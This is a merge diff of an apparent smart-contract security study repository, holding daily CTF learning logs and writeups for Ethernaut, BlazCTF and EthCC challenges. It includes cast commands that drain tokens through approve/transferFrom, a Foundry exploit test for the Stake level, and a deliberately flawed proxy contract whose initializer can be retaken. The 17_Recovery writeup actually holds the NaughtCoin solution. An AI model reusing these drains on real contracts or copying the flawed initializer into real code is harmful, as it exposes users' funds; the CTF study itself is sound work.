Merge remote-tracking branch 'origin'

0xE.md

@@ -84,5 +84,7 @@ timezone: Pacific/Auckland
 ### 2024.09.20
 [[Blaz CTF 2023] 4 | Lockless Swap](./Writeup/0xE/blazctf-2023/lockless-swap.md)  
 
+### 2024.09.21
+参加 Blaz CTF 2024  
 
 <!-- Content_END -->

0xLight.md

@@ -245,6 +245,13 @@ function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes cal
 ```
 这是攻击的主要代码，但是不理解为什么要连续调用那么多次skim，也没弄清楚攻击逻辑。
 
+### 2024.9.21
+做blazctf2024，感觉真正做题和做以前的github里面的题感觉大不相同，要自己去找数据，下载题目
+### 2024.9.22
+因为不怎么用telegram今天一登陆发现错过了1000多信息，也发现原来要在那上面请假才算，，，
 
+blazctf2024做出了两道，等明天比赛结束了写
+
+https://github.com/JadeLight7/blazctf2024/tree/main
 
 <!-- Content_END -->

0xNezha.md

@@ -93,5 +93,8 @@ bytes32[3] private data 通过合约调用的方式当然无法读取 private 
 这一关主要考察 ERC20 的 ABI，该代币的持有者无法直接转账，必须等锁定期过了才能转。但如果把全部额度授权给第三人，则第三人可以把代币全部提走。主要使用 approve(address _spender, uint256 _value) 和 transferFrom(address _from, address _to, uint256 _value)。 [15_NaughtCoin](./Writeup/0xNezha/Ethernaut/15_NaughtCoin.md)
 
 ### 2024.09.20
-这一关主要考察delegatecall()。目标合约想要通过 timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp)) 来调用库合约的 setTime(uint256 _time) 达到修改目标合约中 uint256 storedTime 变量的目的。然而使用 delegatecall() 函数进行外部调用时，当涉及到 storage 变量的修改时，是根据 slot 的位置来修改的，而不是通过变量名。也就是说库合约中的 uint256 storedTime 位于 slot0，则目标合约调用外部函数时，修改的也是目标合约的 slot0，而不是位于其他 slot 的变量 storedTime。
+这一关主要考察delegatecall()。目标合约想要通过 timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp)) 来调用库合约的 setTime(uint256 _time) 达到修改目标合约中 uint256 storedTime 变量的目的。然而使用 delegatecall() 函数进行外部调用时，当涉及到 storage 变量的修改时，是根据 slot 的位置来修改的，而不是通过变量名。也就是说库合约中的 uint256 storedTime 位于 slot0，则目标合约调用外部函数时，修改的也是目标合约的 slot0，而不是位于其他 slot 的变量 storedTime。[16_Preservation](./Writeup/0xNezha/Ethernaut/16_Preservation/16_Preservation.md)
+
+### 2024.09.21
+这一关主要考察 合约地址的计算和 destroy() 的应用。合约地址计算就不多说了，也可以在区块浏览器中直接查到合约地址，然后调用 destroy() [17_Recovery](./Writeup/0xNezha/Ethernaut/17_Recovery.md)
 <!-- Content_END -->

AlexLiao.md

@@ -323,4 +323,8 @@ abi.encodePacked(type(Contract).creationCode, uint256(uint160(address(owner))))
 
 ### 2024.09.21
 
+參加 BlazCTF 2024
+
+### 2024.09.22
+
 <!-- Content_END -->

BillyC.md

@@ -114,5 +114,7 @@ https://hackmd.io/@0xbc000/SJ61x8j3R
 1. Damn Vulnerable DeFi - Backdoor https://hackmd.io/@0xbc000/rJ1d_9ZTC
 2. Work on blog post for old challenges
 
+### 2024.09.21
+1. BlazCTF .... but only solve the hello world 😢
 
 <!-- Content_END -->

KeShin.md

@@ -190,14 +190,18 @@ KeShin, 合约安全新人
 - sstore(treasury.slot, calldataload(4)) 是从 calldata 的第4位开始读取数据，那么我们构造 calldata 使值大于 255
 - [POC](./Writeup/KeShin/A-Ethernaut%20CTF/30-HigherOrder/)
 
-#### [Ethernaut CTF : 31 Stake](https://ethernaut.openzeppelin.com/level/301)
+#### [Ethernaut CTF : 31 Stake](https://ethernaut.openzeppelin.com/level/31)
+- 使合约满足条件：合约的 ETH balance 大于 0，totalStaked 比 合约的 ETH balance 大（这意味着有 WETH 质押），我自己必须是质押人，但质押余额是 0（质押过然后撤回了）
 - [POC](./Writeup/KeShin/A-Ethernaut%20CTF/31-Stake/)
 
 
 ### 2024.9.20
+#### [Ethcc CTF 2023 : 1 Proxy capture](https://github.com/spalen0/warroom-ethcc-2023?tab=readme-ov-file#task-1---proxy-capture-15-points)
+- [POC](./Writeup/KeShin/B-ETHCC2023/1-ProxyCapture/)
 
 ### 2024.9.21
 
+
 ### 2024.9.22
 
 <!-- Content_END -->

Ronas.md

@@ -105,4 +105,12 @@ timezone: Asia/Taipei
 
 - [A. Ethernaut CTF - level 23 Dex2](/Writeup/Ronas/Ethernaut%20CTF/level23.md)
 
+### 2024.09.20
+
+- 請假
+
+### 2024.09.21
+
+- 參加 Blaz CTF
+
 <!-- Content_END -->

Sandy.md

@@ -85,4 +85,10 @@ timezone: Asia/Taipei
 完成題數：28
 
 今天解Ethernaut CTF 2024 SpaceBank
+
+### 2024.09.21
+完成題數：29
+
+今天解Ethernaut CTF 2024 Start.exe
+Ethernaut-Dex 寫到一半
 <!-- Content_END -->

Tanner.md

@@ -174,4 +174,11 @@ timezone: Asia/Taipei
 - [POC](./Writeup/Tanner/test/QuillCTF/CollatzPuzzle.t.sol) 
 
 
+### 2024.09.21
+
+學習內容: 
+
+- Working on BlazCTF
+
+
 <!-- Content_END -->

Writeup/0xNezha/Ethernaut/17_Recovery.md

@@ -0,0 +1,14 @@
+### 第15关：NaughtCoin 
+
+这一关主要考察 ERC20 的 ABI，该代币的持有者无法直接转账，必须等锁定期过了才能转。但如果把全部额度授权给第三人，则第三人可以把代币全部提走。
+
+1.攻击者把代币授权给第三人
+```shell
+cast send 0x目标代币地址 "approve(address _spender, uint256 _value)" 0x第三人的地址 代币的数量 --rpc-url=https://blastapi.io --private-key=攻击者的私钥
+ ```
+2.第三人把代币转移走
+```shell
+cast send 0x目标代币地址 "transferFrom(address _from, address _to, uint256 _value)" 0x攻击者的地址 0x第三人的地址 代币的数量 --rpc-url=https://blastapi.io --private-key=第三人的私钥
+ ```
+
+ 点击 Submit Instance, 过关。

Writeup/KeShin/A-Ethernaut CTF/31-Stake/foundry.toml

@@ -2,5 +2,5 @@
 src = "src"
 out = "out"
 libs = ["lib"]
-
+evm_version = "Shanghai"
 # See more config options https://github.com/foundry-rs/foundry/blob/master/crates/config/README.md#all-options

Writeup/KeShin/A-Ethernaut CTF/31-Stake/src/Stake.sol

@@ -24,7 +24,7 @@ contract Stake {
         require(bytesToUint(allowance) >= amount,"How am I moving the funds honey?");
         totalStaked += amount;
         UserStake[msg.sender] += amount;
-        (bool transfered, ) = WETH.call(abi.encodeWithSelector(0x23b872dd, msg.sender,address(this),amount));
+        (bool transfered, ) = WETH.call(abi.encodeWithSelector(0x23b872dd, msg.sender,address(this),amount)); // transfer from
         Stakers[msg.sender] = true;
         return transfered;
     }

Writeup/KeShin/A-Ethernaut CTF/31-Stake/test/Stake.t.sol

@@ -7,10 +7,51 @@ import {Stake} from "../src/Stake.sol";
 contract StakeTest is Test {
 
     function setUp() public {
+        vm.createSelectFork("https://ethereum-sepolia-rpc.publicnode.com", 6733964);
     }
 
-    function test_Increment() public {
-        counter.increment();
-        assertEq(counter.number(), 1);
+    function test_Stake() public {
+        Stake stake = Stake(0x8F9457389FD5f54CDAeb59FA053261A3428F698B);
+
+        console.log("totalStaked : ", stake.totalStaked()); // 0
+
+        console.log("ca eth balance : ", payable(address(stake)).balance); // 0
+
+        address weth = 0xCd8AF4A0F29cF7966C051542905F66F5dca9052f;
+
+        address userA = 0xA6270E61a6485f649f7E18b6e9eBF4d1d184D69d;
+        address userB = 0x9b20948606A59671C2019Bad4085AA0f8bC7860F;
+
+        vm.startPrank(userA);
+
+        payable(userB).transfer(0.1 ether);
+
+        stake.StakeETH{value : 0.01 ether}();
+
+        stake.Unstake(0.01 ether);
+
+        vm.stopPrank();
+
+        vm.startPrank(userB);
+
+        stake.StakeETH{value : 0.01 ether}();
+
+        (bool success, bytes memory data) = weth.call{value: 0.01 ether}(abi.encodeWithSignature("deposit()", ""));
+
+        (bool success1, bytes memory data1) = weth.call(abi.encodeWithSignature("approve(address, uint256)", address(stake), uint256(0.5 ether)));
+
+        (bool success2, bytes memory data2) = weth.call(abi.encodeWithSignature("balanceOf(address)", userB));
+
+        console.log("userB weth balance : ", bytesToUint(data2));
+
+        stake.StakeWETH(0.01 ether);
+
+        console.log("totalStaked : ", stake.totalStaked()); 
+
+        console.log("ca eth balance : ", payable(address(stake)).balance);
+
+        console.log("user is staker : ", stake.Stakers(userA));
+
+        console.log("user stake balance : ", stake.UserStake(userA));
     }
 }

Writeup/KeShin/B-ETHCC2023/1-ProxyCapture/.gitignore

@@ -0,0 +1,14 @@
+# Compiler files
+cache/
+out/
+
+# Ignores development broadcast logs
+!/broadcast
+/broadcast/*/31337/
+/broadcast/**/dry-run/
+
+# Docs
+docs/
+
+# Dotenv file
+.env

Writeup/KeShin/B-ETHCC2023/1-ProxyCapture/README.md

@@ -0,0 +1,66 @@
+## Foundry
+
+**Foundry is a blazing fast, portable and modular toolkit for Ethereum application development written in Rust.**
+
+Foundry consists of:
+
+-   **Forge**: Ethereum testing framework (like Truffle, Hardhat and DappTools).
+-   **Cast**: Swiss army knife for interacting with EVM smart contracts, sending transactions and getting chain data.
+-   **Anvil**: Local Ethereum node, akin to Ganache, Hardhat Network.
+-   **Chisel**: Fast, utilitarian, and verbose solidity REPL.
+
+## Documentation
+
+https://book.getfoundry.sh/
+
+## Usage
+
+### Build
+
+```shell
+$ forge build
+```
+
+### Test
+
+```shell
+$ forge test
+```
+
+### Format
+
+```shell
+$ forge fmt
+```
+
+### Gas Snapshots
+
+```shell
+$ forge snapshot
+```
+
+### Anvil
+
+```shell
+$ anvil
+```
+
+### Deploy
+
+```shell
+$ forge script script/Counter.s.sol:CounterScript --rpc-url <your_rpc_url> --private-key <your_private_key>
+```
+
+### Cast
+
+```shell
+$ cast <subcommand>
+```
+
+### Help
+
+```shell
+$ forge --help
+$ anvil --help
+$ cast --help
+```

Writeup/KeShin/B-ETHCC2023/1-ProxyCapture/foundry.toml

@@ -0,0 +1,6 @@
+[profile.default]
+src = "src"
+out = "out"
+libs = ["lib"]
+
+# See more config options https://github.com/foundry-rs/foundry/blob/master/crates/config/README.md#all-options

Writeup/KeShin/B-ETHCC2023/1-ProxyCapture/script/Counter.s.sol

@@ -0,0 +1,12 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.13;
+
+import {Script, console} from "forge-std/Script.sol";
+
+contract CounterScript is Script {
+    function setUp() public {}
+
+    function run() public {
+        vm.broadcast();
+    }
+}

Writeup/KeShin/B-ETHCC2023/1-ProxyCapture/src/DasProxy.sol

@@ -0,0 +1,12 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.13;
+
+import "openzeppelin-contracts/contracts/proxy/ERC1967/ERC1967Proxy.sol";
+
+// code borrowed from repo with proxies & tests implemented in forge https://github.com/FredCoen/Proxy_implementations_with_forge
+
+contract DasProxy is ERC1967Proxy {
+    constructor(address _implementation, bytes memory _data)
+        ERC1967Proxy(_implementation, _data)
+    {}
+}

Writeup/KeShin/B-ETHCC2023/1-ProxyCapture/src/Impl.sol

@@ -0,0 +1,56 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.13;
+
+import "openzeppelin-contracts/contracts/proxy/utils/UUPSUpgradeable.sol";
+import "openzeppelin-contracts/contracts/access/Ownable.sol";
+
+contract Impl is UUPSUpgradeable, Ownable {
+    mapping(address => uint256) public balances;
+    mapping(address => uint256) public withdrawals;
+    mapping(address => bool) public whitelistedUsers;
+
+    constructor() Ownable(msg.sender) {}
+
+    function initialize(address owner) public payable {
+        require(owner == address(0), "!initialize");
+        owner = _msgSender();
+        require(msg.value >= 0.1 ether, "!ether");
+        balances[_msgSender()] += msg.value;
+        _transferOwnership(owner);
+    }
+
+    function deposit() public payable {
+        require(whitelistedUsers[_msgSender()], "!whitelisted");
+        balances[_msgSender()] += msg.value;
+    }
+
+    function withdraw(uint256 amount) public {
+        address sender = _msgSender();
+        require(whitelistedUsers[sender], "!whitelisted");
+        require(balances[sender] >= amount, "!balance");
+        balances[sender] -= amount;
+        payable(sender).transfer(amount);
+        withdrawals[sender] += amount;
+    }
+
+    function getBalance() public view returns (uint256) {
+        return balances[_msgSender()];
+    }
+
+    function getWithdrawals() public view returns (uint256) {
+        return withdrawals[_msgSender()];
+    }
+
+    function whitelistUser(address user) public onlyOwner {
+        whitelistedUsers[user] = true;
+    }
+
+    function removeUser(address user) public onlyOwner {
+        whitelistedUsers[user] = false;
+    }
+
+    function _authorizeUpgrade(address) internal override onlyOwner {
+        require(withdrawals[_msgSender()] > 1, "!withdraw");
+        require(whitelistedUsers[_msgSender()], "!whitelisted");
+    }
+}